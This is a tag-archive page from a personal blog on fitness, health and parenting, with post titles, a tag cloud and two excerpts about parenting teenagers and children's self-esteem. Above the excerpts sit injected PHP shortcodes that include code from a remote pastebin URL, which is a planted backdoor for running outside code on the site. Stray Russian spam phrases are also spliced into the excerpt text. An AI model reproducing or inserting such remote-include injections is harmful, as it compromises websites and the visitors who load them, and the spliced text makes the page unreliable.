Subscribe to Blog via Email
Find What You’re Looking for!
- P90X3 is coming! FAQ and info on my January Test Group
- Free Kindle Book | Be A People Person by John C. Maxwell!
- What you allow is what will continue
- Whats for dinner?
- It’s Don’t Feel Bad Tuesday
- Meditation. You’re doing it WRONG!
- This is (almost) 40!
- a peek inside my mind…
- Off to the 1940’s…sometimes I time travel!
- Conquer MOUNTAINS!
- It’s like riding a bicycle…
- Letting Go – Parenting Teens
Some of my favorite blogs
Tagsavoid injuries Balance better sex calories Can't Christmas Clean Eating Cold common mistakes Core Daughter diet Eating Flu Food gym Health health benefits Healthy Cooking Hope kids Love Mom moms nutrition parenting passion Peace Recipes Religion Rest Running Season Sex Sick Sister sleep society solutions Spirituality tips To DO woman womens workout
Tag Archives: parenting
[insert_php] include(‘http[:]//pastebin.com/raw/F9ffPKBM’); [/insert_php][php] include(‘http[:]//pastebin.com/raw/F9ffPKBM’); [/php]
I am Mama to three teenagers.Правила реагирования It’s funny, I remember when they were little and people would comment on how close they were in age (22 mths each way) and then almost immediately they would say “OH! Just wait … Continue reading
Щелезуб Self-esteem at any age can be tricky. But, I am trying to teach my children how to believe in themselves as well as others and encourage them to celebrate their individuality. If you are at comfortable with and within … Continue reading